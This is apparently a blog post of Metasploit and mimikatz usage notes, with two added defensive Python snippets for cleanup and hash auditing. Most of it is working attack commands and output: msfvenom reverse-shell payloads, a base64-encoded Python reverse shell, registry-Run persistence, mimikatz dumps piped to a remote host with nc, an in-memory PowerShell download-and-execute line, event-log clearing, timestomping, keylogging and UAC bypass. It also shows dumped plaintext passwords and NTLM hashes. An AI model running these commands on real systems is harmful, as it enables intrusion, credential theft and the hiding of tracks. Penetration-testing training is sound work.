Some usage tips for the Metasploit Framework (continuously updated)
Posted by 思源湖的鱼
Preface
Notes on various ways of using the Metasploit Framework.
I. MSF
msfvenom options (from its built-in help):
-p, --payload <payload>       Payload to use
-l, --list [module_type]      List all available modules of the given type: payloads, encoders, nops, all
-n, --nopsled <length>        Prepend a NOP sled of the given length to the payload
-f, --format <format>         Output format (use --help-formats for the list of formats msf supports)
-e, --encoder [encoder]       Encoder to use
-a, --arch <architecture>     Target architecture of the payload
--platform <platform>         Target platform of the payload
-s, --space <length>          Maximum size of the resulting payload
-b, --bad-chars <list>        Characters to avoid, e.g. '\x00\xff'
-i, --iterations <count>      Number of times to encode the payload
-c, --add-code <path>         Additional win32 shellcode file to include
-x, --template <path>         Custom executable file to use as a template
-k, --keep                    Preserve the template program's behaviour and inject the payload as a new thread
--payload-options             List the payload's standard options
-o, --out <path>              Save the payload to a file
-v, --var-name <name>         Custom variable name to use in certain output formats
--smallest                    Generate the smallest possible payload
-h, --help                    Show help
--help-formats                List the output formats msf supports
1. Tomcat password brute-force module
use auxiliary/scanner/http/tomcat_mgr_login
show options
set rhosts 192.168.2.147
set RPORT 8080
run
Note: by default Tomcat locks an account after 5 failed login attempts.
2. Setting up a Windows reverse shell
Step 1: generate the Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe
//LHOST is the public IP of the listener
//LPORT is the callback port
//4433.exe is the generated file
Step 2: configure the listener IP and port
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 2xx.94.50.153
msf5 exploit(multi/handler) > set LPORT 4433
msf5 exploit(multi/handler) > run
Step 3: the shell connects back
meterpreter > sysinfo
Computer : WIN-UKKED2CCSHJ
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x86/windows
meterpreter > getuid
Server username: IIS APPPOOL\padt002
3. Setting up a Linux reverse shell with msf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f elf > payload.elf
//LHOST is the public IP of the listener
//LPORT is the callback port
//payload.elf is the generated file
4. Setting up persistence with msf
Meterpreter's persistence script injects a Meterpreter agent so that Meterpreter keeps running after the system reboots.
- For a reverse connection, the interval at which the agent calls back to the attacking machine can be set.
- For a bind connection, the time at which the agent binds and opens its listening port can be set.
We run the persistence script so that the agent starts at boot; the command and its help are:
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
meterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105
//Meterpreter starts at boot (-X), reconnects every 10 seconds (-i 10), using port 6666 (-p 6666), connecting back to 192.168.71.105 (-r)
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WUST-3E75F1D708_20160106.3022/WUST-3E75F1D708_20160106.3022.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.71.105 LPORT=6666
[*] Persistent agent script is 148426 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[*] Starting connection handler at port 6666 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[+] Agent executed with PID 1308
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
meterpreter >
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 2 opened (192.168.71.105:6666 -> 192.168.71.112:1086) at 2016-01-06 20:30:26 +0800
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.71.112 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter x86/win32 WUST-3E75F1D708\Administrator @ WUST-3E75F1D708 192.168.71.105:6666 -> 192.168.71.112:1086 (192.168.71.112)
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
The autostart script is placed under C:\Documents and Settings\Administrator\Local Settings\Temp\
Once persistence is installed, the session can be reopened later directly from msf:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.71.105
lhost => 192.168.71.105
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > run
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 3 opened (192.168.71.105:6666 -> 192.168.71.112:1098) at 2016-01-06 21:05:58 +0800
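For a responder cleaning up a host where this persistence script ran, the added example below (not code from the page or from Metasploit) parses the script's console output into the artifacts that must be removed: the dropped VBS file, the HKCU Run autorun value, the agent PID and the callback address. The sample output is constructed to mirror the format shown above; hostnames and paths in it are made up.

```python
import re

# Constructed sample: abridged output of "run persistence -X -i 10 -p 6666 -r 192.168.71.105",
# in the format shown in the notes above (hostname, paths and key name are made up).
SAMPLE_OUTPUT = r"""
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/HOST-1234_20160106.3022/HOST-1234_20160106.3022.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.71.105 LPORT=6666
[*] Persistent agent script is 148426 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[*] Starting connection handler at port 6666 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[+] Agent executed with PID 1308
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
"""

# One regex per artifact; each captures the value a responder needs to remove or block.
PATTERNS = {
    "cleanup_rc":   re.compile(r"Resource file for cleanup created at (\S+)"),
    "callback":     re.compile(r"LHOST=(\S+) LPORT=(\d+)"),
    "dropped_file": re.compile(r"Persistent Script written to (.+)$", re.M),
    "agent_pid":    re.compile(r"Agent executed with PID (\d+)"),
    "autorun_key":  re.compile(r"Installed into autorun as (.+)$", re.M),
}


def parse_persistence_output(text):
    """Return a dict of the artifacts the persistence script leaves behind."""
    found = {}
    for name, pat in PATTERNS.items():
        m = pat.search(text)
        if not m:
            continue
        found[name] = m.group(1) if name != "callback" else (m.group(1), int(m.group(2)))
    if "agent_pid" in found:
        found["agent_pid"] = int(found["agent_pid"])
    return found


def cleanup_checklist(found):
    """Turn the parsed artifacts into ordered remediation steps (plain strings)."""
    steps = []
    if "agent_pid" in found:
        steps.append(f"terminate process PID {found['agent_pid']}")
    if "autorun_key" in found:
        # Split "HKCU\...\Run\Name" into the key path and the value name to delete.
        key, _, value = found["autorun_key"].rpartition("\\")
        steps.append(f"delete value {value} under {key}")
    if "dropped_file" in found:
        steps.append(f"delete file {found['dropped_file']}")
    if "callback" in found:
        host, port = found["callback"]
        steps.append(f"block egress to {host}:{port} and hunt for other hosts beaconing there")
    return steps


if __name__ == "__main__":
    for step in cleanup_checklist(parse_persistence_output(SAMPLE_OUTPUT)):
        print(step)
```

The same Run-key path and %TEMP% .vbs pattern are what to look for on other hosts when hunting for this script's artifacts.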
5. Executables
Linux
Reverse connection:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Bind connection:
msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=<Target IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
How to run: copy the executable to the target machine and execute it.
6. Web payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
How to run: place shell.php in the web root and request it with a browser, or run it with:
php shell.php
7. Script shells
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
How to run: copy the contents of shell.py and execute them on the Linux command line:
python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIxOTIuMTY4Ljg4LjEyOCIgICAgICA7ICAgIHBvcnQ9NDQ0NCAgICAgIDsgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICAgIHMuY29ubmVjdCgoaG9zdCxwb3J0KSkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDEpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMikgICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"
8. Shellcode
Linux shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
For AV evasion you still need to work with raw shellcode.
II. mimikatz
1. Retrieving passwords
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;334101 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;334068 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
0;996 Negotiate WORKGROUP CHENGLEE-PC$ n.s. (Credentials KO)
0;49101 NTLM n.s. (Credentials KO)
0;999 NTLM WORKGROUP CHENGLEE-PC$ n.s. (Credentials KO)
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP CHENGLEE-PC$
0;49101 NTLM
0;999 NTLM WORKGROUP CHENGLEE-PC$
0;334101 NTLM chenglee-PC chenglee lizhenghua
0;334068 NTLM chenglee-PC chenglee lizhenghua
meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : chenglee-PC
BootKey : 0648ced51b6060bed1a3654e0ee0fd93
Rid : 500
User : Administrator
LM :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
Rid : 501
User : Guest
LM :
NTLM :
Rid : 1000
User : chenglee
LM :
NTLM : 8d0f8e1a18236379538411a9056799f5
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { chenglee ; chenglee-PC ; lizhenghua }
[1] { chenglee ; chenglee-PC ; lizhenghua }
[2] { chenglee ; chenglee-PC ; lizhenghua }
[3] { chenglee ; chenglee-PC ; lizhenghua }
[4] { chenglee-PC ; chenglee ; lizhenghua }
[5] { chenglee-PC ; chenglee ; lizhenghua }
meterpreter >
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; CLOUDVM ; 1244567 }
[1] { Administrator ; CLOUDVM ; 1244567 }
2. Non-interactive credential dumping
# 1. Export to shash.txt
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit >> shash.txt
# 2. Send straight to a VPS, leaving no file on the local machine
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit | nc 192.168.2.134 4444
3. wdigest
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP CHENGLEE-PC$
0;49101 NTLM
0;999 NTLM WORKGROUP CHENGLEE-PC$
0;334101 NTLM chenglee-PC chenglee lizhenghua
0;334068 NTLM chenglee-PC chenglee lizhenghua
4. tspkg
meterpreter > tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP CHENGLEE-PC$
0;49101 NTLM
0;999 NTLM WORKGROUP CHENGLEE-PC$
0;334101 NTLM chenglee-PC chenglee lizhenghua
0;334068 NTLM chenglee-PC chenglee lizhenghua
5. AV evasion methods
# 1. Use PowerShell to download the script and run it in memory
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
# 2. Procdump + Mimikatz
# procdump download: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
# First dump the process
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Then load the dump locally
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
III. Basic meterpreter commands
1. System commands
Basic system commands
sessions
//sessions -h shows help
sessions -l
//list current sessions
sessions -i <ID>
//interact with a session
sessions -k
//kill a session
background
//send the current session to the background
run
//run an existing module; type run and press Tab twice to list the available scripts
info
//show information about an existing module
getuid
//show the user the session is running as
getpid
//get the PID of the current process
sysinfo
//show the target's system information
ps
//list active processes
kill <PID>
//kill a process
idletime
//show how long the target has been idle
reboot
shutdown
//reboot / shut down
shell
//drop into the target's cmd shell
execute: run a file
execute
//run a file on the target
execute -H -i -f cmd.exe
//create a new cmd.exe process; -H hidden, -i interactive
clearev: clear logs
clearev #clears the Windows application, system and security event logs
2. File system commands
Basic file system commands
getwd
pwd
//show the current working directory
ls
//list the current directory
cd
//change directory
search -f *pass*
//search for files; -h shows help
cat c:\\lltest\\lltestpasswd.txt
//show file contents
upload /tmp/hack.txt C:\\lltest
//upload a file to the target
download c:\\lltest\\lltestpasswd.txt /tmp/
//download a file to the local machine
edit c:\\1.txt
//edit or create a file; if it does not exist it is created
rm C:\\lltest\\hack.txt
//delete a file
mkdir lltest2
//creates a directory only within the current directory
rmdir lltest2
//removes a directory only within the current directory
getlwd
lpwd
//on the attacker's host: show the current directory
lcd /tmp
//on the attacker's host: change directory
timestomp: forge timestamps
timestomp C:// -h
//show help
timestomp -v C://2.txt
//show timestamps
timestomp C://2.txt -f C://1.txt
//copy 1.txt's timestamps onto 2.txt
3. Network commands
# Basics
ipconfig/ifconfig
netstat -ano
arp
getproxy #show proxy settings
route #show the routing table
# portfwd port forwarding
portfwd add -l 6666 -p 3389 -r 127.0.0.1 # forward the target's port 3389 to local port 6666
rdesktop -u Administrator -p ichunqiu 127.0.0.1:6666 #then connect with rdesktop; -u user name, -p password
# autoroute: add a route
run autoroute -h #show help
run autoroute -s 192.168.2.0/24 #add a route into the target's network
run autoroute -p #show the added routes
# The network can then be scanned with arp_scanner, portscan, etc.
run arp_scanner -r 192.168.2.0/24
run post/multi/gather/ping_sweep RHOSTS=192.168.2.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.2.0/24
# After adding the route with autoroute, msf's built-in modules can also provide a socks proxy
# msf provides 3 modules for socks proxying:
# auxiliary/server/socks4a
# use auxiliary/server/socks5
# use auxiliary/server/socks_unc
# First background the session, then:
use auxiliary/server/socks4a
set srvhost 127.0.0.1
set srvport 1080
run
# Then vi /etc/proxychains.conf #add: socks4 127.0.0.1 1080
# Finally use proxychains to go through the Socks4a proxy
# sniffer: packet capture
use sniffer
sniffer_interfaces #list interfaces
sniffer_start 2 #select an interface and start capturing
sniffer_stats 2 #show capture status
sniffer_dump 2 /tmp/lltest.pcap #export the capture as a pcap
sniffer_stop 2 #stop capturing
4. Privilege escalation
(1) getsystem
getsystem
How getsystem works:
- getsystem creates a new Windows service, configured to run as SYSTEM, which connects to a named pipe when it starts.
- getsystem spawns a process that creates the named pipe and waits for a connection from that service.
- The Windows service is started, which causes it to connect to the named pipe.
- The process accepts the connection and calls ImpersonateNamedPipeClient, creating an impersonation token for the SYSTEM user.
- cmd.exe is then spawned with the newly acquired SYSTEM impersonation token, giving us a SYSTEM-privileged process.
(2) bypassuac
User Account Control (UAC) is a security mechanism Microsoft introduced in Windows Vista and later versions; it helps prevent unauthorised changes to the system. Applications and tasks always run in the security context of a non-administrator account unless an administrator explicitly grants administrator-level access. UAC can block unauthorised applications from installing themselves automatically and prevent unintended changes to system settings.
msf provides the following modules to help bypass UAC:
msf5 auxiliary(server/socks5) > search bypassuac
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass
1 exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
2 exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
3 exploit/windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key)
4 exploit/windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection)
5 exploit/windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
6 exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack)
7 exploit/windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
The modules are used in the same way; after running, a new session is returned, and getsystem must be run again in it to obtain SYSTEM privileges.
# Example
meterpreter > getuid
Server username: SAUCERMAN\TideSec
meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac
msf5 exploit(windows/local/bypassuac) > set SESSION 4
SESSION => 4
msf5 exploit(windows/local/bypassuac) > run
[-] Handler failed to bind to 192.168.81.160:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (206403 bytes) to 192.168.81.154
[*] Meterpreter session 5 opened (192.168.81.160:4444 -> 192.168.81.154:1134) at 2019-06-12 06:31:11 -0700
[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.
# A new meterpreter session should come back; running getsystem in it should then succeed
# but here it failed
(3) Kernel exploit privilege escalation
Both Linux and Windows have had many high-severity vulnerabilities that can be used for privilege escalation, for example Windows' MS13-081, MS15-051, MS16-032 and MS17-010; msf also ships exploit modules for them.
meterpreter > run post/windows/gather/enum_patches #check installed patches
msf5 > use exploit/windows/local/ms13_053_schlamperei
msf5 > set SESSION 2
msf5 > exploit
# Example
meterpreter > run post/windows/gather/enum_patches
[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(windows/local/bypassuac) > search MS13-081
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/ms13_081_track_popup_menu 2013-10-08 average Yes Windows TrackPopupMenuEx Win32k NULL Page
msf5 exploit(windows/local/bypassuac) > use exploit/windows/local/ms13_081_track_popup_menu
msf5 exploit(windows/local/ms13_081_track_popup_menu) > set session 4
session => 4
msf5 exploit(windows/local/ms13_081_track_popup_menu) > exploit
[!] SESSION may not be compatible with this module.
[-] Handler failed to bind to 192.168.81.160:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] Exploit aborted due to failure: no-target: Running against 64-bit systems is not supported
[*] Exploit completed, but no session was created.
# but it failed, never mind
5. Remote desktop & screenshots
enumdesktops
//list available desktops
getdesktop
//get the desktop meterpreter is currently attached to
set_desktop
//set the desktop meterpreter is attached to; -h shows help
screenshot
//take a screenshot
use espia
//or use the espia module to take a screenshot, then type screengrab
run vnc
//connect via VNC remote desktop
getgui command
run getgui -h
//show help
run getgui -e
//enable remote desktop
run getgui -u lltest2 -p 123456
//add a user
run getgui -f 6661 -e
//forward port 3389 to 6661
getgui is no longer recommended by the framework; use run post/windows/manage/enable_rdp instead
When getgui adds a user, the user is sometimes created successfully but has no permission to log in via remote desktop
enable_rdp script
run post/windows/manage/enable_rdp
//enable remote desktop
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456
//add a user
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662
//forward port 3389 to 6662
The script is located at /usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
Reading enable_rdp.rb shows that RDP is enabled by modifying the registry with reg, the user is added by calling cmd.exe and net user, and the port forward uses the portfwd command
6. Keylogging
keyscan_start
//start keylogging
keyscan_dump
//dump the recorded keystrokes
keyscan_stop
//stop keylogging
7. Information gathering
# The information-gathering scripts are located at:
# modules/post/windows/gather
# modules/post/linux/gather
# Some commonly used ones:
run post/windows/gather/checkvm #is this a virtual machine
run post/linux/gather/checkvm #is this a virtual machine
run post/windows/gather/forensics/enum_drives #list partitions
run post/windows/gather/enum_applications #installed software
run post/windows/gather/dumplinks #recent file operations
run post/windows/gather/enum_ie #IE cache
run post/windows/gather/enum_chrome #Chrome cache
run post/windows/gather/enum_patches #installed patches
run post/windows/gather/enum_domain #find the domain controller
8. Hash usage: obtaining hashes
run post/windows/gather/smart_hashdump
//dump password hashes from the SAM; requires SYSTEM privileges
9. Obtaining credentials
In an internal network one administrator may manage many servers, and the passwords used may be identical or follow a pattern; if a password or hash can be obtained and then tried against other internal servers, the results can be unexpectedly good.
(1) Using mimikatz
load mimikatz #help mimikatz shows help
wdigest #get Wdigest passwords
mimikatz_command -f samdump::hashes #run a raw mimikatz command
mimikatz_command -f sekurlsa::searchPasswords
# Example
meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > wdigest
[!] Not currently running as SYSTEM
[*] Attempting to getprivs ...
[+] Got SeDebugPrivilege.
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP SAUCERMAN$
0;48748 NTLM
0;999 NTLM WORKGROUP SAUCERMAN$
0;476238 NTLM SAUCERMAN TideSec 123456
0;476209 NTLM SAUCERMAN TideSec 123456
meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : saucerman
BootKey : 691cff33caf49e933be97fcee370256a
RegOpenKeyEx SAM : (0x00000005)
Erreur lors de l'exploration du registre
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { TideSec ; SAUCERMAN ; 123456 }
[1] { TideSec ; SAUCERMAN ; 123456 }
[2] { SAUCERMAN ; TideSec ; 123456 }
[3] { SAUCERMAN ; TideSec ; 123456 }
[4] { TideSec ; SAUCERMAN ; 123456 }
[5] { TideSec ; SAUCERMAN ; 123456 }
(2) Using meterpreter's run hashdump command
meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 691cff33caf49e933be97fcee370256a...
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:134: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:268: warning: constant OpenSSL::Cipher::Cipher is deprecated
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:272: warning: constant OpenSSL::Cipher::Cipher is deprecated
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:279: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Dumping password hints...
TideSec:"123456"
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
TideSec:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
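The hashdump lines above are in pwdump format (user:rid:lmhash:ntlmhash:::). The added example below (not code from the page or from Metasploit) audits such a dump from the defender's side, flagging the three conditions that matter for remediation: accounts whose NTLM hash is the well-known empty-password hash, accounts whose LM hash is not the empty sentinel (LM storage still enabled), and the password reuse across accounts that the credentials section above describes. The dump is constructed; apart from the two public sentinel values every hash in it is made up.

```python
import re
from collections import defaultdict

# Well-known sentinels: LM hash when LM storage is disabled / empty, NTLM hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NTLM = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump line: user:rid:lmhash:ntlmhash:::
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Constructed sample in the format printed by hashdump / smart_hashdump above;
# all hashes other than the two sentinels are made up.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
alice:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
bob:1003:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
"""


def parse_pwdump(text):
    """Return a list of (user, rid, lm, ntlm) tuples, skipping lines that are not pwdump records."""
    rows = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            user, rid, lm, ntlm = m.groups()
            rows.append((user, int(rid), lm.lower(), ntlm.lower()))
    return rows


def audit_hashes(rows):
    """Flag weak-credential conditions a defender should remediate."""
    findings = {"empty_password": [], "lm_hash_stored": [], "shared_ntlm": []}
    by_ntlm = defaultdict(list)
    for user, rid, lm, ntlm in rows:
        if ntlm == EMPTY_NTLM:
            findings["empty_password"].append(user)   # blank password (or check that the account is disabled)
        if lm != EMPTY_LM:
            findings["lm_hash_stored"].append(user)   # LM hashing not disabled; trivially crackable
        by_ntlm[ntlm].append(user)
    # Identical NTLM hashes mean identical passwords: one crack or pass-the-hash reaches all of them.
    for ntlm, users in by_ntlm.items():
        if ntlm != EMPTY_NTLM and len(users) > 1:
            findings["shared_ntlm"].append(sorted(users))
    return findings


if __name__ == "__main__":
    for kind, hits in audit_hashes(parse_pwdump(SAMPLE_DUMP)).items():
        print(f"{kind}: {hits}")
```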
(3) post/windows/gather/smart_hashdump
